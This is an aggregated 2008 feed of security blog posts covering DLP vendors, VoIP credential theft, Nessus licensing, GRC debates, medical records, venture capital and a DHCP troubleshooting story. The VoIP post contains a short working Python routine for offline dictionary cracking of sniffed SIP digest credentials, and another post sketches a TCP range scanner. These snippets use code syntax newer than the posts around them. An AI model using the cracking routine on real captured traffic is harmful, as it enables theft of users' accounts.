Thursday, May 15, 2008

Spliced feed for Security Bloggers Network

New kid on the DLP block [IT Security: The view from here]

Posted: 15 May 2008 07:18 AM CDT

When I was at InfoSec, my friend and Ingrian predecessor Norberto Costa, now at RSA, asked me if I'd seen Orchestria. I immediately got a mental picture of their stand at RSA2008, and realised that that was all I knew of them.

"Yes, they were at RSA," I said helpfully. When I got home I looked up their site and saw that they had an international presence, but an R&D centre in Taunton. For those of you not familiar with UK geography or anthropology, Taunton is in Somerset, on the west coast of the UK, which is not quite as cosmopolitan as the west coast of the US. Somerset is famed for its cider, cheese (Cheddar is in Somerset) and holes (Wookey Hole is a cave, near Cheddar), not its technology.

I dropped them an email, explaining my fondness for all things West Country and my desire to speak to them, and managed to get half an hour on the phone with the CTO yesterday. I was most disappointed to find that he did not speak about combine harvesters with a Somerset burr. In fact he was very obviously a professional businessman, as proven by his opening gambit.

"I was a technical specialist at Benchmark Capital, who invested in Google amongst others."

Benchmark paid for him to set up Orchestria, with proper funding, a proper team, and some real experience. This was in 2001, and I hadn't heard anything about them until last month. Since then I have been asked about them a number of times. For someone who pretends to be familiar with the data security space, this was slightly embarrassing. Not any more though.

"Orchestria was set up as a compliance tool, and was sold as such into very large companies for the last 5-6 years."

It was only the DLP bandwagon coming along which made them realise that they had something which could do that and a whole load more. If they are to be believed, Orchestria are beating the likes of Vontu in accounts where they appear together. I fully expect a mail from Kevin to explain why this is untrue, and will print it here in the interests of fair play. If this is the case, it is little wonder they have been so hyped recently.

Digging a little deeper into the technical side, Orchestria uses a natural language engine, hundreds of times faster than regex and other methods used in current DLP. They have 26 agents, covering every possible exit point on the network, on every popular platform. They cover email protection, which few of the others manage to do well. It all sounds very impressive.
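For context on that speed claim, here is a minimal Python sketch of the kind of pattern-plus-checksum matching that regex-based DLP engines of this era perform (the pattern and the Luhn filter are illustrative only; this is not Orchestria's engine or any vendor's actual ruleset):

```python
import re

# Loose credit-card-shaped pattern: 13-16 digits, optionally separated.
CARD_RE = re.compile(r"\b(?:\d[ -]?){13,16}\b")

def luhn_ok(digits: str) -> bool:
    """Luhn checksum: filters out most random digit runs."""
    total, parity = 0, len(digits) % 2
    for i, ch in enumerate(digits):
        d = int(ch)
        if i % 2 == parity:  # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def scan(text: str) -> list[str]:
    """Return Luhn-valid card-like numbers found in outbound content."""
    hits = []
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if luhn_ok(digits):
            hits.append(digits)
    return hits

print(scan("invoice ref 4111 1111 1111 1111 attached"))  # → ['4111111111111111']
```

Running something like this over every byte of every outbound channel is exactly the cost a natural language engine would be claiming to beat.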

I have yet to see proof, and I'm sure to get a barrage of emails from my other DLP contacts saying why theirs is better. In fact I hope I do, this is exciting stuff.

There you go Norberto, I asked.

VoIP and identity fraud on the BBC [SIPVicious]

Posted: 15 May 2008 05:06 AM CDT

The BBC News is running an article highlighting one of the most basic vulnerabilities in the majority of current VoIP providers - the lack of encryption. Indeed, this is a problem: SIP digest authentication sends an MD5 hash derived from the password over the network in cleartext, so anyone watching the traffic can perform an offline dictionary attack and quickly recover the credentials. The attack has been described in countless blogs, articles and papers by now, and some tools are very efficient at demonstrating this issue.
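To make the offline attack concrete, here is a minimal Python sketch of SIP digest authentication (which borrows HTTP digest per RFC 2617, shown here without the qop extension): the phone sends MD5(HA1:nonce:HA2), where HA1 = MD5(user:realm:password). Everything except the password crosses the wire in cleartext, so an eavesdropper can test candidate passwords at leisure. All values below are made up.

```python
import hashlib

def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()

def sip_digest_response(user, realm, password, method, uri, nonce):
    """Compute the digest response a SIP phone sends in its REGISTER."""
    ha1 = md5hex(f"{user}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    return md5hex(f"{ha1}:{nonce}:{ha2}")

# Everything below except the password is visible on the wire.
sniffed = {
    "user": "1001", "realm": "voip.example.com",
    "method": "REGISTER", "uri": "sip:voip.example.com",
    "nonce": "3b1f0a",
    "response": sip_digest_response("1001", "voip.example.com", "letmein",
                                    "REGISTER", "sip:voip.example.com",
                                    "3b1f0a"),
}

def offline_crack(sniffed, wordlist):
    """Replay the hash computation for each candidate password."""
    for guess in wordlist:
        r = sip_digest_response(sniffed["user"], sniffed["realm"], guess,
                                sniffed["method"], sniffed["uri"],
                                sniffed["nonce"])
        if r == sniffed["response"]:
            return guess
    return None

print(offline_crack(sniffed, ["password", "123456", "letmein"]))  # → letmein
```

Note that the attacker never touches the server after the capture, which is why this is so much quieter than active guessing.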

What caught my eye is the mention of VoIP credentials being sold on the underground at $17 apiece. So I emailed Mr Gladwin, who was quoted in the article. This is a summary of our email conversation:
  • There is no indication that stolen VoIP details were harvested because of the lack of encryption
  • If anyone comes across underground forums / sites / resources which have prices, please let me know. Unfortunately Dave Gladwin has not been able to provide me with a reference so far
  • There was no indication as to the size or volume of the VoIP credentials trading
Skype took the chance to remind us that this is not an issue for them (since they make use of a proprietary protocol which has encryption built in).

I'm interested in learning which method is being used to steal credentials. Take your pick:
  • Sniffing at WiFi internet cafés / hacked service providers etc., followed by offline password attacks
  • Active password attacks (such as those supported by SIPVicious svcrack). Such attacks were previously used by Robert Moore, and obviously by others who were not caught ;-)
  • Hacked VoIP service providers or end users
  • Phishing attacks
My feeling is that active password attacks will give you the best results when the target is simply "the Internet". But in the end, what matters is what's being abused right now and how we can prevent and mitigate it.

Links for 2008-05-14 [del.icio.us] [Anton Chuvakin Blog - "Security Warrior"]

Posted: 15 May 2008 12:00 AM CDT

Token Passing with Incognito Part 3 [Carnal0wnage Blog]

Posted: 14 May 2008 11:32 PM CDT

Sorry, no screenshots; I didn't think anyone would care that much, but I have been able to confirm in my testing (DameWare 6) that if you are using DameWare in your enterprise for remote management/admin, you are leaving tokens lying around on the remote boxes.

Because DameWare just gives you a screen on the remote host and you still have to log in, the token lingers until you reboot.

Good to know if you are auditing an organization that uses DameWare. Like most things, the real protection is to ensure the auditor/attacker can't get on the box in the first place, and for client-side attacks, that the privilege needed to leverage the token-passing tool is not granted to user accounts (or even admin accounts, unless it's needed). This is configurable in Group Policy.

Still to do: Terminal Services and RDP.

Val Smith tells it like it is [Carnal0wnage Blog]

Posted: 14 May 2008 11:23 PM CDT

God Bless Val Smith for laying it out there.

http://seclists.org/dailydave/2008/q2/0055.html

"I'm in it for the fun.

There I said it. If everyone did everything securely, I wouldn't have
much to do and I'd have to pour coffees or flip burgers for a living.
I like showing up for a pen test and finding unpatched boxes, or users
sharing admin passwords. I love finding web apps with null byte file
inclusion bugs, or passwordless ssh keys with sudo permissions on
every server. Its FUN. I suspect other security researchers have
reached this conclusion (even if they haven't admitted it to
themselves yet) that security is probably too hard a problem to
"solve" and all our ranting really doesn't make anyone more secure in
the long run. At this point, broken things are fun and we just want to
play and thankfully people are willing to pay for it. I don't mind if
you continuously make it just a little bit harder, just to keep it
interesting, but don't take away my exploits please! ;) "

Changes to Nessus License Model [Carnal0wnage Blog]

Posted: 14 May 2008 11:20 PM CDT

Tenable has changed the Nessus license model to essentially do away with the free version for anyone who scans networks (yeah, yeah, there are exceptions). I won't get into whether that's greedy or not; like Martin McKeay said, "Tenable made a business decision that they need to collect revenue on their plugin feeds in order to continue providing the level of support they have always given. Some people are going to complain that Tenable is getting greedy; I'd counter that they just want to get paid for the work they've been supplying to the community for years."

For the most part I agree with that, and I think it was a smart decision by Tenable to look around, see that comparable VA scanners cost more, and conclude they "might as well" charge too. But I do have to admit that, since there is no good tool that "does it all", it is getting mighty annoying to pay for multiple tools to get a job done.

A new, fully open source VA scanner like Nessus used to be is long overdue, but I don't think anyone will step up to bat. The only reason to do it would be to make money, and why go up against Nessus?

But if anyone IS taking requests... a VA scanner where I can select specific checks without running all the cruft Nessus runs (or without needing all the Nessus libraries) would be nice. A little command-line jobby that you throw an IP range and a check at, and it does the rest, would be more than handy.
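For what it's worth, the skeleton of that little command-line jobby is not much code. This is only a hedged sketch with a plain TCP connect standing in for the "check" (nothing like a real plugin engine, and the usage line is hypothetical):

```python
import ipaddress
import socket

def hosts_in(cidr: str) -> list[str]:
    """Expand a CIDR range into usable host addresses."""
    return [str(h) for h in ipaddress.ip_network(cidr, strict=False).hosts()]

def tcp_open(ip: str, port: int, timeout: float = 1.0) -> bool:
    """The one 'check': can we complete a TCP connect to ip:port?"""
    try:
        with socket.create_connection((ip, port), timeout=timeout):
            return True
    except OSError:
        return False

def scan(cidr: str, port: int) -> list[str]:
    """Run the check across the range; return hosts where it fired."""
    return [ip for ip in hosts_in(cidr) if tcp_open(ip, port)]

# Usage idea: scan("10.0.0.0/24", 22) from a wrapper script that takes
# the range and the check name on the command line.
```

A real version would swap `tcp_open` for pluggable checks, but the throw-it-a-range-and-go shape is already there.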

Is Virtual Security Technology A Prime Target For Acquisition? [Security In The Virtual World]

Posted: 14 May 2008 11:14 PM CDT

This week has been an interesting week in the virtual security blog world! Simon Crosby of Citrix/XenSource stated in his podcast that he felt virtualization vendors like VMware and Citrix didn't have the competence to address the security challenges of virtualization, and Chris Hoff blogged about it, saying the statement is a cop-out and that they should do more to secure their platforms. Alan Shimel also blogged on the topic and agreed with Hoff, and I blogged about it agreeing with both Simon and Hoff.

To restate my position: I think Simon is correct that virtualization vendors like VMware and Citrix do not have the expertise today to address all of the security challenges. I also agree with Hoff that they should address more of them. So this leads me to my own opinion: some of the virtualization vendors will acquire security technologies to differentiate themselves from the others and to acquire the expertise. Many say that the virtualization market will become commoditized and that security can help protect its value.

Think about it.  Would you rather buy a Virtual Environment or a Secure Virtual Environment?!

So.. Onto the topic of this blog!  Is Virtual Security Technology A Prime Target For Acquisition?

I'd love your opinion so please comment!!

What triggered my blog on this topic was this rumor I heard today.  Some buzz started today that one of the virtual security startups just agreed behind closed doors to be acquired by one of the big guys.  But, who could it be?  Reflex Security, Catbird, Blue Lane, Altor Networks, VMSight, Embotics, etc.

I have an idea of who it could be but don't want to spread rumors that could be false.  The other question is whether or not there is an atmosphere of acquisition frenzy brewing in the virtualization market. 

Please comment on your thoughts - just click the comments link below.

107.4 WDNS…All requests, no replies [BumpInTheWire.com]

Posted: 14 May 2008 10:47 PM CDT

El Sidekick, and perhaps TB, read the title to this post and chuckled.  The title stems from a simple configuration oversight.  Three times over.

As I write this the air seems a little more pure, the sun a little brighter and the grass a little greener. This game we play isn’t a Mike Tyson (in his prime) title bout that lasts 47 seconds. A lot of times it turns into a 12-round slugfest that goes to the judges.

The DHCP problem that I’ve written about here, here, here and here came back with a vengeance last week and has been happening every day since. We opened a ticket with Cisco thinking it was a switch configuration problem. I ran a dozen different inquiries by a local Cisco SE trying to solve this problem. The support ticket resulted in a “the switches are configured correctly.” That didn’t help solve the problem. Cisco support said that the next step would be to get some network traces to see where the traffic was not getting through. We did these traces when this problem first appeared in January. For whatever reason, after I did them and analyzed the trace I thought that I had bad data. I’ve slept and drank since then and can’t remember why I thought the data was bad. That’s neither here nor there right now.

Yesterday we did get a known good trace that told the story. The DHCP request was leaving the access port and was being seen at the uplink port on the edge switch, but was NOT being seen on the uplink port of the core switch. That narrowed it down to three things: either the edge switch was not transmitting the DHCP request, our LANenforcer 2024 was dropping or blocking the traffic, or the uplink port on the core switch was not receiving the DHCP request. Now I’m no networking expert, but the likelihood of the uplink ports not transmitting or receiving the DHCP traffic seemed very low to me. When this problem appeared today I started focusing on the LANenforcer 2024. I noticed that the port where all of these DHCP problems were originating had just shy of 100 more users logged on through it than the next highest utilized port.
It had 257 users logged in, to be exact (remember this number for later). In a snap decision we decided to move a 48-port switch that was part of a “daisy chain” off of a bigger switch to another switch on a different port pair on the LANenforcer 2024. All of a sudden the 10 or 12 users that could not connect all morning connected immediately. Perhaps we had passed a threshold for a single port pair we didn’t know about. Hell, I didn’t know. I was a desperate man grasping at straws.

From day two or three of this problem we figured it was “load” related, as the problem always showed up about 9:00 AM, after the last of our users logged in. After seeing that the number of logged-on users on this particular port pair was substantially higher than the others, I fired off an email to Nevis Networks’ technical support. My good man Quentin called me late this afternoon on a fact-finding mission, and out from the clouds the sun began to shine. While talking to Quentin and describing the problem I could see (or hear) a lightbulb go off above his head. Much to my chagrin, the LANenforcer 2024 has a setting for “Max Allowed MACs” per port pair. The default value is 256. Obviously the LANenforcer 2024 was doing exactly what it was supposed to do and was limiting the number of MACs through any single port to 256. Some days we would hit this limit, most days we would not. Much like ol’ Nessie, the problem would disappear as soon as it arrived. I am confident now saying this DHCP problem is behind us.
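For what it’s worth, this class of per-port MAC cap isn’t unique to Nevis; Cisco’s port security feature has the same kind of knob. The snippet below is purely an analogy (the LANenforcer setting is its own thing, and the interface name here is made up):

```
interface GigabitEthernet0/1
 switchport port-security
 switchport port-security maximum 256
 switchport port-security violation restrict
```

Either way, the lesson is the same: when a box silently drops traffic past a default limit, the symptom looks exactly like an intermittent “load-related” network fault.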

In celebration I cooked up a great meal tonight: a steak, some cream-cheese bacon-wrapped jalapeños, along with some Miller Lite. The hours of thought, research, digging, hunting, searching and lamenting over this problem the last 6 months merit such a feast. The relevant thing is that this little blog of mine, which is really just an online diary, provided some much needed answers to questions about the timeline of this problem the last two days. The search feature on this site is much faster than the search of my inbox!

Rich Mogull does his best Stiennon imitation, says GRC is dead [StillSecure, After All These Years]

Posted: 14 May 2008 10:12 PM CDT

Some of the Stiennon "magic" must have rubbed off on Rich Mogull when they were both at Gartner, or maybe, in a case of imitation being the sincerest form of flattery, Rich M secretly admires Richard S. In any event, taking a page out of the "xxxx is dead" playbook, Rich writes that GRC is dead. In fact Rich says it was stillborn and never really alive. There are many things in Rich's article, as well as in Gunnar Peterson's article that he references, that I agree with completely. However, overall I think Rich's fatal mistake is one of Titanic proportions. He is mistaking the tip of the iceberg for the entire mountain of ice that is under the water and not as easily seen. The reports and dashboards of GRC products are the by-product of much of the real work and value they bring, not just to the "C" level, but to the security practitioner who is tasked with ensuring compliance as well. I am seeing the compliance workload fall on the already overworked, underpaid security guy time and time again, and they need help with it!

I know people like Mike Rothman say compliance is bull and that if you just follow good security practices, compliance takes care of itself. However, let's be real, folks: between PCI, SOX, FISMA, etc., compliance is driving budget in the security industry. In an industry where the "security guy" just did not have the tools to push through budget for the resources required, compliance has become the sledgehammer that the CISO and other security types use to crash through the doors of the CFO's office and get the budget required.

Before I delve further into why I disagree with Rich, though, let me state where I do agree with him, and with Gunnar for that matter. I do agree that a by-product of compliance has been a move towards running your business as "audit-driven rather than business-driven". Somewhere along the line we have forgotten that the rules, regulations and statutes that drive compliance were put in place to provide a minimum of acceptable security and confidentiality to protect sensitive information. It was supposed to be about protecting the data, not about checking off the compliance box! I agree with Rich that it has become a way into the C-level office. But what is so bad about that? Symantec has been selling their security into the CFO for years. Rich, not having worked at a vendor you may not realize how hard it is for the security folks to get budget approval for the tools they know they need. In order for security to get its fair share of the budget pie, it is imperative that security budget decisions are made at the C-level. If the security team can't get the approval, the security vendor is going to try and help.

While dashboards and reports are the tip of the iceberg and the shiny baubles that GRC vendors use to get attention at the C-level, I think the bulk of the work takes place below the water. It is making sure that the enterprise is in fact in compliance. Making sure that everyone has the latest patch level, has AV installed and that data is protected from leakage is the real work. Testing and ensuring this is the real job of GRC; the reports and dashboards are just the way you show it working. Rich, I think you are the one being short-sighted if you think these products are just about the reports. Without actually doing the analysis and investigation, the reports are meaningless. To my mind it is much like SIM reports: without actionability and correlation, how much value are the SIM reports?

GRC is a needed tool in today's security practitioner's toolkit. Practitioners are being placed in the position of ensuring compliance, and they need the ability to do so. They also need help getting budget approved for the tools required to do the job. We can rant all we want about compliance for compliance's sake being asinine, but the fact is that is the world we live in right now, and rather than spitting into the wind, let's figure out how to make it work best for us.

Electronic Medical Records: Friend or Foe? [The Security Catalyst]

Posted: 14 May 2008 09:37 PM CDT

By Patrick Romero

In 2004, President Bush set a goal that by 2014 most Americans would be using an Electronic Medical Record (EMR). In his vision, doctors would be using EMR systems with interoperable standards that would allow them to share lab results, images, computerized orders and prescription information with hospitals and other health facilities.

The Office of the National Coordinator for Health Information Technology was created by President Bush to guide the work on EMR standards and coordinate public and private efforts. Its job is to define minimally functional systems as those on which doctors can record and manage progress notes, order tests, record test results and electronically prescribe medications.

The reasons for the insufficient progress are many, according to the report, “Gauging the Progress of the National Health Information Technology Initiative.” They include slow adoption of EMRs by physician practices, the impractical nature of a national health information network, the difficulty of creating interoperability standards and Congress’ failure to pass legislation addressing health IT roadblocks.

A 2005 survey estimated that only 13 percent of solo practitioners and 16 percent of groups with 2–4 physicians have adopted EMRs, compared to 29 percent of groups with 10–19 physicians and 39 percent of groups with 20 or more physicians.

Slightly more than a quarter of practices with 11 or more physicians — a situation that describes only 8% of doctors — used comprehensive EMRs in 2006, according to an October 2007 Centers for Disease Control and Prevention report based on the National Ambulatory Medical Care Survey. Solo or single-partner practices — which account for almost half of all doctors — reported much lower levels of comprehensive EMR use: 7.1% of solo practitioners, 9.7% of those with a partner.

Another reason for slow progress on EMR adoption is that a national health information network is impractical, said experts in the California foundation report. The system is intended to be a “network of networks” linking state, regional and other health information exchanges so they can share information.

According to the eHealth Initiative Foundation (eHI), 28 states have initiated Health Information Technology (HIT) planning and an additional seven states have progressed to the implementation stage.

Privacy Concerns

The Medicare Electronic Medication and Safety Protection Act (S 2408), sponsored by Sen. John Kerry, would require physicians to use e-prescribing for Medicare patients or face a 10% cut in payments. The bill is pending in the Senate Finance Committee.

Deborah Peel, head of the Coalition for Patient Privacy, said an e-prescribing bill would be an excellent opportunity to prohibit data mining.

Privacy advocates are concerned that the bill should come with more privacy protection. They would like to require that any prescription data transmitted electronically be used for the express purpose of prescription filling and submitting the necessary codes to the insurer for payment. Other provisions being sought are annual reports to patients listing everyone who accessed their data and mandated security breach notifications.

While EMRs are not a panacea for fixing our national medical system, they do offer more than traditional modes of storing information. The government should continue to encourage doctors to implement EMRs in their practices through substantial grants and subsidization. There are currently such programs, but more needs to be done to publicize them. While a mandate might eventually be necessary, there are less restrictive alternatives currently available. Nevertheless, it is time that the medical community catch up with other sectors of our economy that have embraced the use of digital information.

May 2008 Security Round Table | RSA - Going Beyond the Hype [The Security Catalyst]

Posted: 14 May 2008 06:58 PM CDT

I had a great time at RSA 2008 this year, but didn’t attend any keynotes and only saw some snippets of sessions. Yet I took several *quality* briefings during the course of the week — and will be interviewing, profiling and sharing my impressions over the coming months. I started the week a bit sad — after walking the show floor, it felt to me that the industry was, en masse, running in entirely the wrong direction. I ended the week not only with renewed hope, but with new and powerful insights.

RSA carries a lot of hype. Now that the conference is over, Martin and I wanted to go beyond the hype and invited a panel with mixed experience to share with us their impressions, opinions and lessons learned. During this SRT, we cover the role of bloggers as media, the *real* value of RSA and a whole bunch of other interesting issues and perspectives.

I also share, near the end, what I thought the theme should have been. Thinking about it now, it is a good choice for next year, or even for a SCC conference!

This marks the return of the SRT. We already have the June SRT recorded — a great show with the Jericho Forum, dispelling a lot of myths and providing some good insight into how they are helping to drive change in the industry. In July we’ll tackle the issue of using botnets to fight botnets and August will revisit a topic raised during the May SRT — the responsibility of security bloggers and the role of new media.

Happy Listening.

Another Old Presentation: Security Metrics [Anton Chuvakin Blog - "Security Warrior"]

Posted: 14 May 2008 06:24 PM CDT

Another oldie, but ... well, maybe not goldie: my 2005 presentation on security metrics.

Network Security Podcast, Episode 104 [securosis.com]

Posted: 14 May 2008 05:18 PM CDT

Martin and I were all over the map this week, but still managed to keep things under 30 minutes. We talk about the Dave and Buster’s hack, data exposure in Chile, and browser virtualization, among other things. The show is up over at netsecpodcast.com.

New Nessus Licensing: NSP Interview With Ron Gula, CEO Of Tenable [securosis.com]

Posted: 14 May 2008 05:13 PM CDT

If you didn’t catch the news today, Tenable is changing the Nessus license and enabling the real-time signature/plugin feed for the free version. Martin and I managed to snag Ron Gula for a short interview we posted over at NetSecPodcast.com.

Overall I think it’s a very positive license change and it shouldn’t hurt you unless you were using the free version for commercial purposes.

New video podcast posted [Got the NAC]

Posted: 14 May 2008 05:05 PM CDT

Tawnee Kendall and I sat down and recorded this video on Interop 2008. Check it out!





GRC, Average Deal Size, And The Dangers Of Venture Capital [securosis.com]

Posted: 14 May 2008 04:42 PM CDT

Hot on the heels of my GRC is Dead post, an associate sent me a private rant on a past experience where the investors drove his company down a similar rathole.

Here’s the thing, kids; venture capitalists aren’t there to help you build a long-term business. Their entire goal is to achieve specific returns in specific time periods by driving your company into an exit (IPO or sale). You become a slave to your investors, many of whom aren’t as business savvy as you might think, and most of whom don’t understand your particular market.

My friend is allowing me to post this since he can’t. Keep in mind that some of the biggest “GRC” pushers out there are large companies without VCs (Oracle, SAP, IBM), which thus are running under different dynamics.

The Three Magic Words (or: Why GRC won’t die until the companies do)

I read Mogull’s post on GRC yesterday, and I found myself nodding in agreement with all of it. The basic thrust of the article:

“GRC is now code for "selling stuff to the C-level". It has little to do with real governance, risk, and compliance; and everything to do with selling under-performing products at inflated prices. When a vendor says "GRC" they are saying, "here's our product to finally get us into the Board Room and the CEO's office". The problem is, there isn't a market for GRC.”

This is exactly what GRC is about. But why? Why would our vendor community spend all of their time trying so hard to get into the Board Room and the CEO’s office when there’s an entire market out there of businesses to whom we could sell products? Statistics say that 99% of businesses in the USA have fewer than 1,000 employees: that’s a HUGE market for security software and services that are reasonably priced and deliver value. Why are there almost no vendors looking to that market? And why are many of the ones who do (e.g., UTM vendors) mocked and ridiculed?

Three magical words: “Average Deal Size”.

I learned these magic words when I was a relative newbie in information security, working for a vulnerability management vendor whose aim it was to sell appliances into all parts of the enterprise. They believed that vulnerability management was the kind of tool that needed to be embedded into every subnet within the entire organization, and that a huge infrastructure would be built up to manage vulnerabilities. When looking at who they wanted to be when they grew up, the names that were mentioned were SAP and PeopleSoft. That the CEO should have vulnerability reports on his desk every week. And that the CEO should be reporting vulnerability metrics to the Board at the quarterly meeting. (No, I’m not exaggerating. This is what they believed.)

Unfortunately, no customer seemed to care that much about vulnerabilities. Even in the FUD-laden heyday of worms and viruses (Slammer, Blaster and Nimda, Oh My!), nobody wanted to drop vulnerability management tools on every subnet and embed vulnerability management deep into their business process. It was added cost without incremental benefit. And no CEO really cared about seeing the reports. Most CISOs didn’t even want to see the reports.

At the same time, another company was eating our lunch by offering to scan from the outside, on the web. They were basically giving the service away, selling little scans at $5K for anybody who wanted them. And they were rolling in cash compared to us. So, being the go-getter that I was, I put together a plan to create a competitive business within our company. Even with ridiculously conservative estimates, we were going to double revenue within a year (because it’s not hard to double an infinitesimally small number).

And I took it to senior management, who summarily rejected it. I didn’t understand, and I fought hard, but their answer was firm: “No way.”

I was confused and dejected. This seemed stupid - it didn’t make any business sense. The VP of sales saw this and took me aside after the meeting. He explained it to me, and it was the first time I had heard the three magic words. He would open my eyes to one of the things that makes startups do things that appear absolutely idiotic.

He explained that the reason they wouldn’t compete with the other vendor was that it would lower our “average deal size”. That they would rather have a single $100K deal than 100 $2K deals, even if it was only half of the revenue.

It didn’t make sense to me (it still doesn’t), so I asked him why.

“Because that’s one of the big things that venture capitalists care about when they’re valuing your company”, he said. “And our board is made up of our venture capitalists.” The lights went on at that moment.

Fast forward to today. The push toward GRC isn’t because it makes business sense for any of the vendors (i.e., will increase revenue or reduce costs), but entirely because the vendors in the space are worshipping the gods of VC-driven boards who are using average deal size as the metric. It’s why you see companies that are making good progress in mid-market or the mid-range of the small enterprise suddenly declare that their target is the C-level of the “Global 2000” companies.

The problem with this is that most 100-person companies are entirely ill-suited to live in that environment. Large enterprises demand (to use Moore’s term) the “whole product”. A full support staff, complementary products, training, and serious hand-holding resources that a 100-person, $10M company just doesn’t have. And, having worked in startups for the majority of the last 10 years, I can say that it kills more than it benefits. The burdens of supporting large, enterprise customers are burdens that, for the most part, only large, enterprise vendors are built to support.

It always surprises me when a successful company (e.g., a small consulting company) that is ideally suited to selling, marketing and positively pwning the mid-market and mid-level sales decides to turn up-market (and become a “GRC company”) to compete against companies that are built for that environment (e.g., E&Y, Accenture, IBM Global Services, etc.). Rather than taking the market that they have built themselves up to succeed at, they enter a market that they’re entirely ill-suited for, and go through multiple VPs of sales and marketing wondering why their pipeline is weak.

But the three magic words are powerful. They blind men and women to smart business decisions (mostly because they are used at board meetings). And they create companies that are willing to give anything to end up at the top end of the market, even if they have to make up acronyms (GRC) and sacrifice all actual measures of business success to get there.

Social Media Release: Crutch for the Weak? [Mediaphyter]

Posted: 14 May 2008 02:20 PM CDT


I’ve been speaking up on Twitter about my concerns around Social Media Releases (SMRs). I’ve apparently been flapping my gums enough to get the attention of PR Newswire, a representative of which called me yesterday to find out why I’ve been so negative. I know that social media expands far beyond marketing but in this blog I’m focusing on my concerns with SMRs further enabling sub-par PR skills.

Over at Social Media Release, Chris Heuer gives a quick overview of the purported magic of the SMR:

“The Social Media Release is intended to make it easier on people to identify and share the most important pieces of information with others around the globe while adding their own valuable perspective and/or editorial. It also takes full advantage of HTML, multimedia and the network effects enabled by the Internet by using structured data via the Microformat, which ultimately increases its findability by interested parties - which is ultimately the driving purpose of public relations and the press release specifically.”

Let’s home in on the implication that ruffles my former PR girl feathers the most: increasing the findability of press releases is the ultimate purpose of PR. I could’ve sworn the ultimate driving purpose of PR was to fuel company visibility and credibility with the support of third-party validation, which in turn drives revenue.

Press releases, SMRs or otherwise, are sales tools and information vehicles for customers, partners and shareholders. They are not a primary driver for bringing news to the media and achieving balanced coverage. If an SMR is discovered out on the Web, even if it includes comments from third-party sources or trackbacks to blogs that support it, it is still covered in marketing slime. Can it really be any more of a trusted resource than a regular old press release?

Heuer, Jeremy Pepper, Shel Holtz and Todd Defren (the credited developer of the first SMR) had a large Twitter discussion a while back on where the SMR fits in the PR landscape. I agreed most strongly with Pepper on what is also my biggest concern: there is no substitute for good relationship building and written communications. I don’t care if the medium is an SMR or an email or a carrier pigeon or some futuristic Jetson-esque device. What helps drive good news is a) solid content and b) trusted relationships and there is no “tool” that replaces it — my friend and well-known tech journalist Ryan Naraine agrees. He’s said before that he does not care how the news is delivered, just give him good content and don’t waste his time.

The proponents of the SMR say that they never intended it to be a replacement for good PR skills and I trust them on that one. These are seasoned guys. I worry more about the less-than-stellar or junior PR folks using it as yet another cop-out for poor writing or lackluster communication skills. And if their perception might be that the sole objective of PR is to increase “findability” of marketing collateral, we’ve got problems.

Less dangerous to me is the social media newsroom, which I believe was also fathered by SHIFT Communications. I tend to like the simple and clean approach that Fathom SEO is using (the company recently released a WordPress template for such). The social media newsroom seems to accomplish what I think most companies who have a broad blogosphere presence would want, from linking to multimedia and social networking pages to integrating commentary. But if you have a fully functional social media newsroom, and a handle on truly top notch PR strategy, do you need the SMR?

In the end, regardless of what I blather here, I’m still trying to find the answer to one simple question: “Does anyone have any metrics to suggest the proven success of an SMR in *any* arena?” Especially considering their cost. I’ve asked this on Twitter on and off for about a month now and no one has yet provided a case study.

Can you?

Interesting Information Security Bits for May 14th, 2008 [Infosec Ramblings]

Posted: 14 May 2008 02:06 PM CDT


Hi folks. Good afternoon. Here are a few things to look at today.

There is a post on the nCircle blog about some IPv6 issues we need to be aware of.

Sam Ryder has an interesting post up on alert blogic about SaaS and its impact on the channel.

The May issue of “IT Compliance in Realtime” is available from Rebecca. Go here for a teaser :)

Frank Cassano has a post up at bloginfosec about building out a framework to structure your information security program around. I have only skimmed it so far, but it looks interesting.

As others have noted, there no longer appears to be a fee (that's a link to a pdf) for real-time vulnerability updates for Nessus for home and non-commercial users.

Have a great rest of your day!

Kevin

Database Activity Monitoring Is As Big As, Or Bigger Than, DLP [securosis.com]

Posted: 14 May 2008 12:12 PM CDT

Last night I had this recurring dream I seem to have a few times a year. It involves a plane crash, but not one that I’m on. The dream always changes, but in every case I’m out and about someplace, I look up and see a struggling plane, it crashes, and I rush over to help. The dream almost always ends before I do anything, and since I’m no longer a field medic, portions of it usually involve me figuring out how I can help. Must be my overblown, currently unused hero complex or something. Never doubt the bounds of my ego.

This has absolutely nothing to do with what I want to talk about today; I just think it’s weird.

I swear I posted on this before, but I can’t find it anywhere. During a dinner with one of the Database Activity Monitoring vendors (the best DAM name in the industry) I mentioned their market size was equal to, or slightly larger than, the pure-play DLP market (that’s where we toss out peripheral products that only use DLP as a feature). I assumed this was common knowledge, but their jaws dropped. We ran through some back of the envelope calculations, and placed DLP at about $70M in 2007, with DAM right in the same range. My estimates might be off by up to $20M, but that’s basically a rounding error when we’re talking total market revenues.

Here are a few caveats. My estimates don’t include a lot of peripheral vendors, and I slice down as best I can to estimate DLP vs. DAM specific sales. For example, Orchestria launched a new DLP product in 2007, but I only include a fraction of their revenue in the market rollup since most of the revenue is still coming from their compliance product. Same for Verdasys, Proofpoint, Imperva (also has web application firewalls), and other vendors either with multiple product lines, or where DLP or DAM is a feature of something else. I work with most of the major DLP and DAM vendors, and while some share their revenues under NDA, some don’t, and these are mostly private companies. I’m also certain a couple of them are lying to me.

So there you have it. DLP is heavily hyped, but DAM is essentially the same size without as much hype. I believe this is because DAM, in some cases, directly addresses a compliance requirement, while DLP isn’t usually required (although it can often really help).

Peach 2.1 Fuzzer BETA2 Released [Security-Protocols]

Posted: 14 May 2008 10:29 AM CDT

Michael Eddington has released Peach 2.1 Beta2 today. This release includes many bug fixes, features, improvements, and supersedes 2.0 as the recommended version to use. Some of the updates...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

MySpace wins $230 million anti-spam judgment [mxlab - all about anti virus and anti spam]

Posted: 14 May 2008 09:48 AM CDT


Sanford Wallace and his partner Walter Rines face a $230 million anti-spam judgment. The duo were found responsible for sending out phishing scams designed to harvest MySpace login credentials, then bombarding members with messages punting gambling and smut websites. As many as 730,000 such spam messages were sent to MySpace members starting in late 2006.

Links for 2008-05-13 [del.icio.us] [Anton Chuvakin Blog - "Security Warrior"]

